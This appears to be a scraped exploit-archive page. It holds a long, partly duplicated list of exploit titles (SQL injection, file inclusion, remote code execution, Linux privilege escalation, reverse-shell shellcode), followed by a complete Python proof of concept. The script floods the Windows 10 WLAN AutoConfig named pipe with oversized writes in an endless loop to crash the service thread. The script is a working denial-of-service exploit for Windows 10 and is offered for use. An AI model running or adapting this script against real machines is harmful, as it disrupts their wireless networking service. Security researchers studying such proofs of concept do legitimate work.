fb1dd3709f
12 new exploits vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption XChat - Heap Overflow Denial of Service XChat 2.8.9 - Heap Overflow Denial of Service Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1) glibc - getaddrinfo Stack Based Buffer Overflow (1) glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC) Microsoft Edge - JSON.parse Info Leak Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index Microsoft Edge - CMarkup::EnsureDeleteCFState Use-After-Free (MS15-125) Microsoft Internet Explorer 9 - CDoc::ExecuteScriptUri Use-After-Free (MS13-009) Microsoft Edge - CBaseScriptable::PrivateQueryInterface Memory Corruption (MS16-068) Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC) Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1) Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2) Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Microsoft PowerShell - XML External Entity Injection XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7' XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7) Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap glibc - getaddrinfo Stack Based Buffer Overflow (2) glibc - 'getaddrinfo' Stack Based Buffer Overflow Microsoft Internet Explorer jscript9 - JavaScriptStackWalker Memory Corruption (MS15-056) Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes) Gravity Board X 1.1 - (csscontent) Remote Code Execution Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion Mambo Component ExtCalendar 2.0 - Remote File Inclusion Mambo Component com_babackup 1.1 - File Inclusion Mambo Component bigAPE-Backup 1.1 - File Inclusion E-Smart Cart 1.0 - 'Product_ID' SQL Injection E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion Cartweaver - 'Details.cfm ProdID' SQL Injection Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection xeCMS 1.x - (view.php list) Remote File Disclosure xeCMS 1.x - 'view.php' Remote File Disclosure Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection Easy-Clanpage 2.2 - 'id' SQL Injection Easy-Clanpage 2.2 - 'id' Parameter SQL Injection JAMM CMS - 'id' Blind SQL Injection Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities JAMM CMS - 'id' Parameter Blind SQL Injection Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection Easy-Clanpage 3.0b1 - (section) Local File Inclusion WebChamado 1.1 - (tsk_id) SQL Injection Pre News Manager 1.0 - (index.php id) SQL Injection Pre Ads Portal 2.0 - SQL Injection Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion WebChamado 1.1 - 'tsk_id' Parameter SQL Injection Pre News Manager 1.0 - 'id' Parameter SQL Injection Pre ADS Portal 2.0 - SQL Injection GLLCTS2 - 'listing.php sort' Blind SQL Injection GLLCTS2 - 'sort' Parameter Blind SQL Injection Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting PHPMyCart - 'shop.php cat' SQL Injection SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion Cartweaver 3 - (prodId) Blind SQL Injection DIY - (index_topic did) Blind SQL Injection PHPMyCart 1.3 - 'cat' Parameter SQL Injection SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion Cartweaver 3 - 'prodId' Parameter Blind SQL Injection DIY - 'did' Parameter Blind SQL Injection ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities PHPEasyNews 1.13 RC2 - (POST) SQL Injection ezcms 1.2 - Blind SQL Injection / Authentication Bypass PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection Devalcms 1.4a - (currentfile) Local File Inclusion Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion IPTBB 0.5.6 - (index.php act) Local File Inclusion IPTBB 0.5.6 - 'act' Parameter Local File Inclusion Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection Mambo Component Articles - 'artid' Parameter Blind SQL Injection Mambo Component 'com_n-gallery' - Multiple SQL Injections Mambo Component N-Gallery - Multiple SQL Injections devalcms 1.4a - Cross-Site Scripting / Remote Code Execution Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection PHP JOBWEBSITE PRO - Authentication Bypass Pre ADS Portal 2.0 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection Mambo Component n-form - 'form_id' Parameter Blind SQL Injection Pre Job Board - (Authentication Bypass) SQL Injection Pre Job Board - Authentication Bypass Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection facil-cms 0.1rc2 - Multiple Vulnerabilities Facil-CMS 0.1RC2 - Multiple Vulnerabilities Family Connections CMS 1.9 - (member) SQL Injection Family Connections CMS 1.9 - SQL Injection Mambo Component 'com_hestar' - SQL Injection Mambo Component Hestar - SQL Injection Joomla! / Mambo Component 'com_tupinambis' - SQL Injection Joomla! / Mambo Component Tupinambis - SQL Injection Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion Mambo Component 'com_materialsuche' 1.0 - SQL Injection Mambo Component Material Suche 1.0 - SQL Injection Pre ADS Portal - 'cid' SQL Injection Pre ADS Portal - 'cid' Parameter SQL Injection Pre News Manager - (nid) SQL Injection Pre News Manager - 'nid' Parameter SQL Injection Mambo Component 'com_akogallery' - SQL Injection Mambo Component AkoGallery - SQL Injection Mambo Component 'com_mambads' - SQL Injection Mambo Component MambAds - SQL Injection Facil-CMS - (Local File Inclusion / Remote File Inclusion) Facil-CMS 0.1RC2 - Local / Remote File Inclusion AskMe Pro 2.1 - (que_id) SQL Injection Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection Pre Job Board Pro - SQL Injection Authentication Bypass Pre Job Board Pro - Authentication Bypass DiY-CMS 1.0 - Multiple Remote File Inclusion DIY-CMS 1.0 - Multiple Remote File Inclusion Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection Pre Ads Portal - SQL Bypass Pre ADS Portal - Authentication Bypass Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection Family Connections CMS 2.5.0 / 2.7.1 - (less.php) Remote Command Execution Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution Family Connections CMS - 'less.php' Remote Command Execution (Metasploit) Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit) Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting Clever Copy 3.0 - Connect.INC Information Disclosure Clever Copy 3.0 - 'Connect.INC' Information Disclosure Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection Cartweaver 2.16.11 - 'Results.cfm' SQL Injection Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection Mambo Component Docman 1.3.0 - Multiple SQL Injection Mambo Component 'com_n-skyrslur' - Cross-Site Scripting Mambo Component N-Skyrslur - Cross-Site Scripting Mambo Component 'com_n-gallery' - SQL Injection Mambo Component N-Gallery - SQL Injection Mambo Component 'com_n-press' - SQL Injection Mambo Component N-Press - SQL Injection Mambo Component 'com_n-frettir' - SQL Injection Mambo Component 'com_n-myndir' - SQL Injection Mambo Component N-Frettir - SQL Injection Mambo Component N-Myndir - SQL Injection AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities Edge SkateShop - Authentication bypass AbanteCart 1.2.7 - Cross-Site Scripting
59 lines
1.4 KiB
Python
Executable file
59 lines
1.4 KiB
Python
Executable file
#!/usr/bin/python
|
|
# wlanautoconfig-poc.py
|
|
#
|
|
# Windows WLAN AutoConfig Named Pipe POC
|
|
#
|
|
# Jeremy Brown [jbrown3264/gmail]
|
|
# Dec 2016
|
|
#
|
|
# > wifinetworkmanager.dll!__FatalError(char const *,unsigned # long,char const *, ...)
|
|
# AsyncPipe::ReadCompletedCallback(void)
|
|
# AsyncPipe::Dispatch(int,void *,void *, ...)
|
|
# Synchronizer::EnqueueEvent(...)
|
|
# AsyncPipe::ReadCompletedStatic(...)
|
|
#
|
|
# --> STATUS_STACK_BUFFER_OVERRUN @ svchost.exe
|
|
#
|
|
# Tested:
|
|
#
|
|
# Windows 10 x86/x64 BUILD 10.0.14393 (vulnerable)
|
|
# Windows Server 2012 R2 x64 (not vulnerable, service doesn't create pipe)
|
|
#
|
|
# Dependencies:
|
|
#
|
|
# pip install pypiwin32
|
|
#
|
|
# Notes:
|
|
#
|
|
# This won't kill Wlansvc service, but the thread servicing the pipe will terminate
|
|
#
|
|
|
|
import win32file
|
|
import pywintypes
|
|
import msvcrt
|
|
|
|
BUF_SIZE = 4096
|
|
PIPE_NAME = r'\\.\pipe\WiFiNetworkManagerTask'
|
|
|
|
def main():
|
|
try:
|
|
handle = win32file.CreateFile(PIPE_NAME, win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, 0, None)
|
|
except Exception:
|
|
print("Error: CreateFile() failed\n")
|
|
return
|
|
|
|
fd = msvcrt.open_osfhandle(handle, 0)
|
|
|
|
if(fd < 0):
|
|
print("Error: open_osfhandle() failed\n")
|
|
return
|
|
|
|
buf = bytearray(b'\x42' * BUF_SIZE)
|
|
|
|
# exact number here could vary, keeping it simple
|
|
while True:
|
|
win32file.WriteFile(handle, buf)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|